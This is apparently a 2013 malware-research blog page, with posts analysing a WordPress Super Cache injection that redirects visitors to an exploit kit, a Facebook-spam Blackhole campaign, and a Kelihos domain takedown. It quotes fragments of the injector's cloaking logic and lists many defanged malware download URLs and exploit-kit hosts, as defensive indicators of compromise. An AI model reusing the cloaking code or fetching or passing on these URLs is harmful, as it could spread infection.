I made domestic report in here -->>[0day.jp], and this is the post about how the malicious redirection was made.

The nature of the infection is, only IE browser with java plugin access is affected, a non direct access. Some parts of the a kind of ACL used in this redirector us still on decoding process, so maybe we can report more feature they use upon 100% finished. If you meet the accepted condition, you will be redirected to Glazukov Exploit Kit to infect you with Zero Access/Sireref malware. I had hard time in confirming this site, so I had to ask many friends to confirm the case and its condition by some tests. The good thing is the site's admin is very supportive and asked me to make investigation properly and allowing this post to be publicly published to prevent more infection.

First, we have to be sure WHICH CODES and WHERE had been injected:

Is that it?? Nope.. The diff result shows more, during the injection session, the header was added with these stuff too:

1,9d0
＜ HTTP/1.1 200 OK
＜ Date: Mon, 29 Jul 2013 10:24:55 GMT
＜ Server: Apache
＜ X-Pingback: h00p://VICTIM.SITE/xmlrpc.php
＜ "Set-Cookie: stats=446501053769c06c565094b26d26e8ef; 
               expires=Mon, 29-Jul-2013 13:24:56 GMT"
＜ Connection: close
＜ Content-Type: text/html; charset=UTF-8
＜ Content-Length: 61451
＜ 

↑Noted this: the header was added with the setting of cookie with stats variable and an expiry date which doesn't exist during the normal mode.
OK, let's move on and see carefully how the breakdown of the injected code goes:

Explanation:

We see the javascript tagged codes, usage of specific cookie, user will be firstly forced to call the landing page of Glazunov Exploit Kit at upper URL, then the checking interface of browser components using PluginDetect (noted: version 0.8.1) will be performed, the condition in Java Exploitation will depend on detected Java version.

If the Java version is ver 7 the JNLP base infection via "buj58i7kc3.jnlp" will be perform, or else the direct Jar class "weptblklaadp.nfpmuqaplgapmsrrmnranye.class" of "8.zip" a CVE-2013-1493 JAR Exploit. In my previous report here -->>[kernelmode.info] I know the payload is a new type of ZeroAccess/ MaxPlus / Sireref payload trojan.

Pictures of the infector components and CVE method used in the Jar(ZIP) infector

Spotting the infection source

So how this code can be injected? This is the point of this post.
Please see the picture above in the marked red below part. It stated:

＜!-- WP Super Cache is installed but broken. 
The path to wp-cache-phase1.php 
in wp-content/advanced-cache.php must be fixed! --＞

Confirming this to the site owner and found that error wasn't suppose to be happened.

I executed the first stage on checks by run into .htaccess, php.ini, default.php etc, wasn't finding anything suspicious, and went deeper to find the apache module is in place, so does the web server daemon used.
Went back to .htaccess and found myself staring into this line :

RewriteCond %{DOCUMENT_ROOT}/wp-content/cache/supercache/%{SERVER_NAME}/$1/index.html -f
RewriteRule ^(.*) "/wp-content/cache/supercache/%{SERVER_NAME}/$1/index.html" [L]

OK, this is the Wordpress Super Cache plugin is running, intrigued by the error caused by the same plugin made me dive into the plugin directories:

  :
2013/07/23  00:00     514 advanced-cache.php
2013/07/23  00:00   1,259 wp-cache-base.php
2013/07/23  00:00   2,988 wp-cache-config-sample.php
2013/07/23  00:00  25,524 wp-cache-phase1.php
2013/07/23  00:00  60,553 wp-cache-phase2.php
2013/07/23  00:00 180,031 wp-cache.php
2013/07/23  00:00  52,772 wp-super-cache.pot
  :

This is just perfectly strange, since everything was installed on 2012/07/23 at exactly midnight :-)) lame..
Just to be sure I made detail comparison to the original plugin:
To find the size changes, but no differences in codes after I "diff"-ed them.. weird.. Making me think the attacker was storing stuff to normal after injection stored?

Let's see what we got now, WP cache plugin error, strange plugin files dates, and an injected code.

Went back to the injected code, found that the obfuscation built by Zend, and using this as grep "significant" character to find the list of the injection code's file sources:

Noted: the yellow color is the files and their path, all of them was injected in the first lines, and the green color is the similarity found in Zend framework builder used.

below is the list of these injectors:

wp-content\advanced-cache.php
wp-content\wp-cache-config.php
victim.site\wp-content\advanced-cache.php
victim.site\wp-content\wp-cache-config.php

And now we know why the error in the top page occured! :-)

The attacker also injected codes in the current WordPress Theme used by the victim, again I pasted the "atahualpa" theme files injected by the malware code:

victim.site\wp-content\themes\atahualpa\comments-paged.php
victim.site\wp-content\themes\atahualpa\comments.php
victim.site\wp-content\themes\atahualpa\footer.php
victim.site\wp-content\themes\atahualpa\functions.php
victim.site\wp-content\themes\atahualpa\index.php
victim.site\wp-content\themes\atahualpa\legacy.comments.php
victim.site\wp-content\themes\atahualpa\searchform.php

Seeing closely into each file we can guess WHEN the attacker was replacing these files:

Understanding how the malicious code works..

Well, the code used to inject pages is as per pasted "safe" code here-->>[PASTEBIN]
The first level of obfuscation process extracted from the code is-->>[PASTEBIN]
With noted(AGAIN): The code is only for view and can't be executed, a.k.a. I "hexed" the codes.

Following the decoded one, in the below line number you'll see this codes:

It shows the regex operation to grab and replace the original contents, and insert the injection code after assembled with the tags ＜BODY and ＜/HTML (marked in purple color), to be noted all of these are possible by the abuse of Wordpress plugin mentioned.

I tried to manually further decode to find two similar pattern obfuscation blocks, each block contains these parts with the below logic:

Obfuscation block...

Decoder..

Parser of the decoded codes..

Well the above codes are a rough copy-paste of my notepads, all you have to do next is grab the blob of data, modified a bit as per those moronz wanted, decode it using the logic seen in the decoder parts, and parse it out.

I tried to follow the flow of codes manually, use only one text editor, but it looks like things went off the rails somewhere.. So it looks like I get stuck in the final decode status here -->>[PASTEBIN]

During to the decoding the blob manually, some of the interesting result shown:

Exclusion of the user agents...

$user_agents = array ("Google",
                      "Slurp",
                      "MSNBot",
                      "ia_archiver",
                      "Yandex",
                      "Rambler

Passing ot the user-agent to the Exploit Kit url...

if((preg_match("/".
   implode("|", $user_agents)."/i", 
      $_SEVER['HTTP_USER_AGENT'])) or
         ( isset($_COOKIE['stats'])))  

At this point I realize that more effort in de-obfuscation will take more time and energy (I have to do it from beginning all over again), which I don't have thise right now, not in the weekdays. So I reproduced the injection source script in the PHP with WP server test environment to get the injection code as per pasted here, bit by bit in text -->>[PASTEBIN]
Noted that the path of the exploit kit and the name of zip/Jar file name has changed. The code is hexed also.

I look further to finish decoding this weekend, hope this writing helps people who got hit by the same threat. Be free to ask me question via comment part of this post.

Additional:

Our members found the trace of similar obfuscation, assumed the previous attacks. So is in the wild..

found this: http://t.co/ric5xiY1ac < @MalwareMustDie @rjacksix @EricOpdyke

— WTF (@Cephurs) August 1, 2013

Moral of the Story

This threat is harmful, as harmful and nasty as a Rogue Apache modules or a Rogue Web Server; Wordpress Super Cache is providing every tools to make the redirection, to control the access, to grab HTTP request and change & parse it into a malicious one in a snap.. And better yet, is easy to be implemented by hacker.. I mean, all they do is making sure you have the old version of WP Super Cache (which can be found out by remote/HTTP checks), brute (or buy) your (stolen) FTP account (somehow) and things like I posted here will happen. The attacker doesn't even need to hack your Apache module, and no need to have root permission to replace the web server related system, thus not leaving many traces (i.e. no .htaccess, no ptp.ini , no default.php, no strange conf to touch..), and a successfully attacker can camouflage their codes like putting a needle in a haystack. And with noted, this is a real IR case friend.. a PoC to what we should aware more of this threat.

I hope all of the WP users to aware of the security risk on using useful plugins they use, as much as they aware its usefulness. Stay update your versions of CMS and its plugins, change your FTP server password regularly (I don't say oftenly) and your risk to have a hacked server like this will be minimized.

Stay safe friends!

#MalwareMustDie!!

Read More

Oh dear ... Yelena Mizulina out does Cameron!

Just when you thought it couldn't get stupider than Cameron' imposing of the smut ban in the UK, this Russian politico has decided to out-do Cameron in the "yep, we can be even more brainless!".

http://www.theregister.co.uk/2013/07/29/russia_to_ban_swearing_on_social_networks_good_luck/

This woman has clearly never seen some of the Russian and Ruskranian blackhat forums I monitor (or for that

Read More

[ALERT] Fake Google Chrome, and yet more malicious SysTweak shenanigans again

Looking up the POST beep codes for a Sony Vaio, led me to a thread on sevenforums.com a few minutes ago, which rather disgustingly (I'd say surprising, but I'm not surprised by SysTweaks ongoing badness anymore - they've been at it so long), led to 4 more examples, of misleading advertising, one belonging to Spark Trust, and 3 others belonging to SysTweak.

The first [1] of these, is at least

Read More

#Alert! #Facebook scam emails that will lead you to #Blackhole EK (162.216.18.169, GoDaddy/Linode)

Note: I wrote this post as a quick note to raise this threat's awareness, a warning note for Facebook users; Thus a PoC to be used as verdict for shutdown purpose of the related domain and IP, so I am sorry if you did not find any deep analysis this time.

We received tons of fake Facebook notification email spams with the three themes pattern: (1)Asking you about Facebook password changes, (2)"Your photo was tagged" notification and (3)Friend Request notification. I made snapshot of these threes as per below (please click to enlarge the pics):

These emails will trick you to click the below malware infection URLs with I pasted the recent ones only:

h00p://198.251.67.11/sonya/index.html
h00p://www.kauai2u.com/hiding/index.html
h00p://nendt.com/horded/index.html
h00p://whittakerwatertech.com/hewed/index.html
h00p://www.readingfluency.net/demising/index.html
h00p://adeseye.me.pn/saluted/index.html
h00p://www.bst-kanzlei.de/gist/index.html
h00p://www.discountprescriptions.pacificsocial.com/signally/index.html

What happen after you accessed those URL is, you will load the malicious JavaScript in the below URL:

h00p://traditionlagoonresort.com/prodded/televised.js

And you will be redirected to the Blackhole exploit Kit site here:

h00p://nphscards.com/topic/accidentally-results-stay.php

The browser will look like this upon redirection...

If we trail this threat further we will meet Trojan Zbot/Pony(Credential Stealer), MedFos(downloader) and Zero Access botnet which are served by this Blackhole.
Same infection chain lead to the same URL also verdicted malicious in here-->>[CLICK]

The Blackhole host itself is up and alive in the below domain and NS:

nphscards.com  A  162.216.18.169
nphscards.com  NS  ns30.domaincontrol.com
nphscards.com  NS  ns29.domaincontrol.com

You will see a long record of infection of this IP as per spotted in URLQuery here-->>[CLICK], with the pasted below:

2013-07-25 12:25:54 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 09:30:28 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 08:33:34 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 02:38:35 h00p://nphssoccercards.com [United States] 162.216.18.169
2013-07-25 01:07:51 h00p://nphssoccercards.com/favicon.ico [United States] 162.216.18.169
2013-07-25 01:05:34 h00p://nphssoccercards.com/ubi/template/identity/lib/style-nurse.htc [United States] 162.216.18.169
2013-07-25 01:03:43 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-25 00:15:33 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-25 00:12:25 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-25 00:11:30 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 00:04:06 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 23:43:58 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 22:49:27 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 22:14:26 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-24 22:02:13 h00p://2013vistakonpresidentsclub.com/ [United States] 162.216.18.169
2013-07-24 21:50:46 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 21:47:23 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 20:03:35 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 19:40:30 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 19:33:18 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2d2i2g302g&Se=302g572f53 (...) [United States] 162.216.18.169
2013-07-24 18:56:07 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?iKoOp=572h322i55&wQrxKfxXfP (...) [United States] 162.216.18.169
2013-07-24 18:53:14 h00p://nphssoccercards.com [United States] 162.216.18.169
2013-07-24 18:25:56 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 18:13:21 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 17:53:12 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 17:17:24 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 16:40:13 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 16:29:31 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 13:18:30 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 12:29:44 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169

And also can be seen in Virus Total URL check here-->>[CLICK], pasted below as:

5/39 2013-07-25 09:17:49 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?ilhtELOHdpisFWs=YgItFHLgkO&JJfLXzq...
3/39 2013-07-25 07:05:13 h00p://2013vistakonpresidentsclub.com/topic/religiouss-selected.php
8/39 2013-07-25 06:05:45 h00p://nphssoccercards.com/adobe/update_flash_player.exe
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?ceJfcWErQTbG=kCwAByXBRdETOJ&tsDWPg=Rp...
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?Ff=5656562e2i&Ce=2d2i562g552g2f572i54...
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?jf=32542d2e2d&Be=2d2i562g552g2f572i54...
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?TbcoUkQBgX=hGSiu&qhiHoQj=JBEYjg
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?ff=2g3131542j&ke=302g572f5352572i572f...
3/39 2013-07-25 04:01:30 h00p://nphscards.com/topic/accidentally-results-stay.php%27%3B
3/39 2013-07-25 03:49:25 h00p://2013vistakonpresidentsclub.com/topic/operation_statistic_objects.php
5/39 2013-07-25 01:22:26 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2e542f5452&ae=302g572f5352572i5...
5/39 2013-07-25 01:21:06 h00p://nphssoccercards.com/contacts.exe
5/38 2013-07-24 23:07:28 h00p://nphssoccercards.com/ubi/template/identity/lib/style-nurse.htc
8/38 2013-07-24 21:40:20 h00p://nphscards.com/adobe/update_flash_player.exe
7/39 2013-07-24 21:19:11 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php
2/38 2013-07-24 21:03:03 h00p://2013vistakonpresidentsclub.com/
4/39 2013-07-24 18:58:16 h00p://nphscards.com/topic/accidentally-results-stay.php
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?Rf=322e2i542f&fe=302g572f5352572i5...
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?Kf=322e2i542f&xe=522e552d57552f305...
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2d2i2g302g&Se=302g572f53525...
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?KYdttLYSrKSgb=BcaETwRFtxefjW&UAoFL...
4/39 2013-07-24 18:05:46 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?iKoOp=572h322i55&wQrxKfxXfPToik=52...
3/39 2013-07-24 17:20:55 h00p://nphssoccercards.com/adobe/adobe_files/mhtB264%281%29.tmp
2/39 2013-07-24 17:18:51 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php
2/39 2013-07-24 17:16:40 h00p://nphssoccercards.com/
2/39 2013-07-24 17:00:10 h00p://nphssoccercards.com/adobe/
2/39 2013-07-24 16:58:25 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?iKoOp=572h322i55&wQrxKfxXfPToi...
2/39 2013-07-24 16:53:57 h00p://nphscards.com/
4/38 2013-07-24 16:18:14 h00p://nphscards.com/topic/accidentally-results-stay.php?mf=542h2i312h&Me=302g572f5352572i572f...
2/39 2013-07-24 15:18:08 h00p://nphssoccercards.com/forum/viewtopic.php
2/38 2013-07-24 15:07:48 h00p://nphssoccercards.com/topic/religiouss-selected.php
4/38 2013-07-23 23:10:24 h00p://nphscards.com/adobe 

More spotted malware infection:

@MalwareMustDie related to the #RoyalBaby campaign: hxxp://nphscards.com/adobe/update_flash_player.exe hxxp://nphssoccercards.com/^

— Darrel Rendell (@DarrelRendell) July 25, 2013

More information of "Royal Baby" scam is here-->>[Malekal]

Domain and IP Network information:

The below is the information of registrar and ISP that provides the IP for this infector:

// Domains & IP registration (for shutddown purpose)
// Is GoDaddy Domain in Linode network

  Domain Name: NPHSCARDS.COM
  Registrar: GODADDY.COM, LLC
  Whois Server: whois.godaddy.com
  Referral URL: http://registrar.godaddy.com
  Name Server: NS29.DOMAINCONTROL.COM
  Name Server: NS30.DOMAINCONTROL.COM
  Status: clientDeleteProhibited
  Status: clientRenewProhibited
  Status: clientTransferProhibited
  Status: clientUpdateProhibited
  Updated Date: 05-oct-2012
  Creation Date: 10-oct-2010
  Expiration Date: 10-oct-2013
  
NetRange:       162.216.16.0 - 162.216.19.255
CIDR:           162.216.16.0/22
OriginAS:
NetName:        LINODE-US
NetHandle:      NET-162-216-16-0-1
Parent:         NET-162-0-0-0-0
NetType:        Direct Allocation
RegDate:        2013-06-19
Updated:        2013-06-19
Ref:            http://whois.arin.net/rest/net/NET-162-216-16-0-1

OrgName:        Linode
OrgId:          LINOD
Address:        329 E. Jimmie Leeds Road
Address:        Suite A
City:           Galloway
StateProv:      NJ
PostalCode:     08205
Country:        US
RegDate:        2008-04-24
Updated:        2010-08-31
Comment:        http://www.linode.com
Ref:            http://whois.arin.net/rest/org/LINODE

Yes, we need GoDaddy cooperation to dismantle this domain to prevent further infection and Linote cooperration to clean up the host.

If you interested in investigation log, you can fetch it here-->>[Download]

Additional

The campaign still goes on, even now:

#MalwareMustDie! Today's fake #facebook notification to infect #malware via #Blackhole, see the IP, is still ALIVE! pic.twitter.com/i7aqdgWX5H

— MalwareMustDie, NPO (@MalwareMustDie) July 26, 2013

#MalwareMustDie!

Read More

Suspension announcement of 97 .RU domains (registered in REGGI.RU) used by Kelihos Crime Group to spread payload via Red Kit Exploit Pack

MalwareMustDie, NPO, during its research activities, is following the process of suspension malware bad domains as important milestones in malware fighting steps. is also publicly releasing some of suspension domains in the "Operation Tango Down" [What is TangoDown?] as a public announcement.

This time we are shutting down the Kelihos Trojan payload download server's used 97 .RU domains, which was distrubuted by the Red Kit Exploit Kit. All of the detected payload URL we registered them into URLQuery and summarize the URL used for infection by automation after all of the data finished to be registered. We thank you URLQuery for providing a good service that is helpful as evidence of crime for the further legal process. In this case we detected 150 URLs infection, under 97 .RU domains, some of the URLs are served under a subdomains. The usage of the DGA-like randomisation for the domain used for the payload is the MO of this distribution.

The Kelihos Trojan were distributed in (mainly) East European (Ukrainian, Latvia, Belarus, Russia) and Asia servers (Japan, Korea, Taiwan and Hongkong) as the secondary layers, with also using the scattered world wide hacked machines.

Verdict of Crime

The current report is a systematic process of a successful suspension process, as a good coordination between MalwareMustDie members and supporters who help spotted, analysed & reported the threat, our PiCs in Tango Team (thank's to ‏@DL for the hard work during holiday time) and the GroupIB who was performing an excellent coordination on dismantling the related domains to the related Russia registrar (REGGI.RU) suspension process. Overall time took 4d+ for the communication and confirmation process taken.

This wave of Red Kit Exploit Kit campaign using Kelihos as payload was spotted infecting world wide, with the help from our Japan team we have a strong evidence of this infection effort as per published in Operation Clean-up Japan (OCJP) in case #113 here-->>[OCJP-013] , on five domestic sites.

Those infection payload is as per below real sample captured below:

RedKit Redirection PoC Snapshot:
[1] [2] [3] [4] [5]

Based on the payloads above we seek and collected all of the payload servers for this shutdown purpose.

Tango Information

The payload URL is as per below long list, which will be followed by another long list of 97 dismantled domains:

Infection URL data:

// #MalwareMustDie! Kelihos payload URL via RedKit EK Infection
// Reference: http://unixfreaxjp.blogspot.jp/2013/07/ocjp-113redkit-exploit-kitkelihosvia.html
// Detection range: July 1st, 2013 - July 16, 2013
// 

// grep rasta*

0 / 3 [7]hxxp://131.155.81.158/rasta01.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/rasta01.exe Belarus 93.125.67.95
0 / 0 [9]hxxp://www.philchor-nb.de/demo/rasta01.exe Germany
0 / 2 [10]hxxp://ikqydkod.ru/rasta01.exe Ukraine 109.251.141.23
0 / 2 [11]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Russian Federation
0 / 6 [12]hxxp://bopefidi.ru/rasta01.exe Russian Federation 2.94.27.238
0 / 2 [13]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://sojouvyc.ru/rasta01.exe Ukraine 31.128.74.7
0 / 2 [15]hxxp://vadlubiq.ru/rasta01.exe Ukraine 109.162.84.6
0 / 2 [16]hxxp://kazlyjva.ru/rasta01.exe Malaysia 58.26.182.98
0 / 2 [17]hxxp://funfubap.ru/rasta01.exe Taiwan 114.35.239.185
0 / 2 [18]hxxp://goryzcob.ru/rasta01.exe Ukraine 109.87.254.247
0 / 2 [19]hxxp://motbajsi.ru/rasta01.exe Ukraine 91.196.61.56
0 / 6 [20]hxxp://xymkapaq.ru/rasta01.exe Latvia 89.201.53.86
0 / 2 [21]hxxp://hupjiwuc.ru/rasta01.exe Ukraine 195.114.156.254
0 / 6 [22]hxxp://runevfoh.ru/rasta01.exe Ukraine 5.248.34.57
0 / 2 [23]hxxp://virerceb.ru/rasta01.exe Argentina 190.227.181.203
0 / 6 [24]hxxp://xatzyjha.ru/rasta01.exe Taiwan 1.172.233.239
0 / 2 [25]hxxp://makgivus.ru/rasta01.exe Canada 99.250.218.131
0 / 2 [26]hxxp://avryjpet.ru/rasta01.exe Belarus 91.215.178.83
0 / 2 [27]hxxp://kyjaqcoz.ru/rasta01.exe Ukraine 213.231.52.44
0 / 2 [28]hxxp://bopefidi.ru/rasta01.exe Taiwan 111.255.72.1
0 / 6 [29]hxxp://ycsycxyd.ru/rasta01.exe Japan 118.104.77.165
0 / 2 [30]hxxp://gazgowry.ru/rasta01.exe Ukraine 77.122.55.112
0 / 2 [31]hxxp://vetarwep.ru/rasta01.exe Kazakhstan 176.222.169.243
0 / 6 [32]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Bulgaria 95.43.87.30
0 / 6 [33]hxxp://gulaxxax.ru/rasta01.exe Ukraine 31.42.69.61
0 / 6 [34]hxxp://onhugxic.ru/rasta01.exe Kazakhstan 109.239.45.48
0 / 2 [35]hxxp://ahfamzyk.ru/rasta01.exe Ukraine 178.150.33.194
0 / 6 [36]hxxp://sykevked.ru/rasta01.exe Ukraine 151.0.44.52
0 / 6 [37]hxxp://ydhicdor.ru/rasta01.exe Ukraine 78.30.249.126
0 / 1 [38]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.87.7.53
0 / 2 [39]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 188.231.173.99
0 / 6 [40]hxxp://kifectah.ru/rasta01.exe Japan 61.27.109.166
0 / 2 [41]hxxp://busasxyv.ru/rasta01.exe Belarus 37.215.87.61
0 / 6 [42]hxxp://yjnaqwew.ru/rasta01.exe Ukraine 93.77.96.252
0 / 6 [43]hxxp://xuktalez.ru/rasta01.exe Ukraine 176.106.211.135
0 / 2 [44]hxxp://ybtoptag.ru/rasta01.exe Latvia 89.191.110.59
0 / 2 [45]hxxp://lygyucce.ru/rasta01.exe Ukraine 94.178.78.102
0 / 6 [46]hxxp://taykenid.ru/rasta01.exe Ukraine 212.92.227.111
0 / 2 [47]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.251.2.33
0 / 6 [48]hxxp://taykenid.ru/rasta01.exe Ukraine 176.8.183.90
0 / 2 [49]hxxp://qeisybyg.ru/rasta01.exe Ukraine 77.87.156.180
0 / 2 [50]hxxp://bysjyhuf.ru/rasta01.exe Taiwan 1.173.164.63
0 / 6 [51]hxxp://najniner.ru/rasta01.exe Taiwan 114.40.130.52
0 / 4 [52]hxxp://193.105.134.189/rasta01.exe Sweden 193.105.134.189
0 / 6 [53]hxxp://dakacdyn.ru/rasta01.exe Ukraine 178.158.82.158
0 / 6 [54]hxxp://higrikpy.ru/rasta01.exe Belgium 85.26.38.155
0 / 2 [55]hxxp://dipteqna.ru/rasta01.exe Ukraine 109.87.32.180
0 / 6 [56]hxxp://kykywpik.ru/rasta01.exe Ukraine 5.1.13.86
0 / 2 [57]hxxp://cimmitic.ru/rasta01.exe Japan 118.237.85.238
0 / 2 [58]hxxp://ybtoptag.ru/rasta01.exe Belarus 91.215.178.235
0 / 6 [59]hxxp://suyzerew.ru/rasta01.exe Kazakhstan 178.91.37.180
0 / 6 [60]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 93.77.68.69
0 / 2 [61]hxxp://ynhazcel.ru/rasta01.exe Kazakhstan 2.133.226.218
0 / 6 [62]hxxp://aflyzkac.ru/rasta01.exe Ukraine 93.77.28.43
0 / 2 [63]hxxp://giktyxvu.ru/rasta01.exe Ukraine 188.190.42.32
0 / 4 [64]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 2 [65]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Ukraine 31.133.38.207
0 / 2 [66]hxxp://aflyzkac.ru/rasta01.exe Japan 210.148.165.67
0 / 6 [67]hxxp://giktyxvu.ru/rasta01.exe Ukraine 178.159.231.99
0 / 6 [68]hxxp://ybtoptag.ru/rasta01.exe Ukraine 89.252.33.161
0 / 6 [69]hxxp://dyvgigim.ru/rasta01.exe Ukraine 37.229.35.234
0 / 4 [70]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 6 [71]hxxp://jehrecyp.ru/rasta01.exe Ukraine 188.230.9.64
0 / 2 [72]hxxp://aro0eq.hozfezbe.ru/rasta01.exe[/code] Ukraine
0 / 6 [73]hxxp://cyrkapov.ru/rasta01.exe Ukraine 176.8.183.90
0 / 6 [74]hxxp://niqtasoz.ru/rasta01.exe Ukraine 46.172.147.122
0 / 2 [75]hxxp://ginkyvub.ru/rasta01.exe Ukraine 93.77.84.22
0 / 2 [76]hxxp://tejjetzo.ru/rasta01.exe Moldova, Republic of
0 / 6 [77]hxxp://fafehwiz.ru/rasta01.exe Ukraine 178.150.115.215
0 / 2 [78]hxxp://yhzelbyp.ru/rasta01.exe Ukraine 37.57.24.238
0 / 2 [79]hxxp://ihurvyun.ru/rasta01.exe Ukraine 178.158.198.249
0 / 6 [80]hxxp://adtyuhuz.ru/rasta01.exe Russian Federation 128.73.7.18
0 / 2 [81]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Hong Kong 118.141.33.46
0 / 6 [82]hxxp://jehrecyp.ru/rasta01.exe Ukraine 91.200.138.241
0 / 7 [83]hxxp://tejjetzo.ru/rasta01.exe Ukraine 94.153.63.166
0 / 3 [84]hxxp://fafehwiz.ru/rasta01.exe Ukraine 81.163.152.32
0 / 3 [85]hxxp://yhzelbyp.ru/rasta01.exe Chile 186.36.204.152
0 / 7 [86]hxxp://adtyuhuz.ru/rasta01.exe Argentina 190.107.122.36
0 / 7 [87]hxxp://aggaxsef.ru/rasta01.exe Taiwan 1.173.221.95
0 / 3 [88]hxxp://bomuxvis.ru/rasta01.exe Taiwan 1.172.231.167
0 / 7 [89]hxxp://jehrecyp.ru/rasta01.exe Ukraine 178.150.57.167
0 / 7 [90]hxxp://xejabfom.ru/rasta01.exe Belarus 176.118.159.88
0 / 3 [91]hxxp://sapigrys.ru/rasta01.exe Ukraine 93.77.97.98
0 / 3 [92]hxxp://sodkanxo.ru/rasta01.exe Ukraine 77.122.55.156
0 / 7 [93]hxxp://aggaxsef.ru/rasta01.exe Ukraine 178.150.169.180
0 / 3 [94]hxxp://fafehwiz.ru/rasta01.exe Ukraine 89.162.163.66
0 / 3 [95]hxxp://zyvjofat.ru/rasta01.exe Taiwan 36.239.213.101
0 / 2 [96]hxxp://paxgeqjo.ru/rasta01.exe Israel 46.121.221.173
0 / 6 [97]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.95.246
0 / 2 [98]hxxp://hiznizoc.ru/rasta01.exe Korea, Republic of
0 / 2 [99]hxxp://lysopzoh.ru/rasta01.exe Ukraine 46.118.218.45
0 / 2 [100]hxxp://zyvjofat.ru/rasta01.exe Ukraine 178.150.192.214
0 / 2 [101]hxxp://xoqhozaz.ru/rasta01.exe Ukraine 109.162.96.64
0 / 2 [102]hxxp://hiznizoc.ru/rasta01.exe Ukraine 176.112.20.187
0 / 6 [103]hxxp://lysopzoh.ru/rasta01.exe Ukraine 93.175.234.62
0 / 6 [104]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.227.0
0 / 6 [105]hxxp://pywudcoz.ru/rasta01.exe Japan 180.14.61.59
0 / 6 [106]hxxp://izytexuf.ru/rasta01.exe Taiwan 123.194.247.85
0 / 6 [107]hxxp://izytexuf.ru/rasta01.exe Kazakhstan 2.132.145.189
0 / 6 [108]hxxp://usfezhyk.ru/rasta01.exe Ukraine 176.98.15.73
0 / 6 [109]hxxp://hipahsah.ru/rasta01.exe Belarus 134.17.112.99
0 / 6 [110]hxxp://talozzum.ru/rasta01.exe Ukraine 93.78.126.109
0 / 6 [111]hxxp://yrupxyen.ru/rasta01.exe Ukraine 5.105.21.178
0 / 6 [112]hxxp://nacwoman.ru/rasta01.exe Ukraine 109.251.74.37
0 / 2 [113]hxxp://libcikak.ru/rasta01.exe Japan 219.102.110.98
0 / 6 [114]hxxp://uphinjaq.ru/rasta01.exe Ukraine 151.0.5.20
0 / 6 [115]hxxp://aziwolge.ru/rasta01.exe Ukraine 151.0.38.74
0 / 6 [116]hxxp://kosnutef.ru/rasta01.exe Ukraine 93.79.38.73
0 / 6 [117]hxxp://kiyvryhy.ru/rasta01.exe Ukraine 80.77.44.150
0 / 2 [118]hxxp://oktizsez.ru/rasta01.exe Ukraine 91.227.207.89
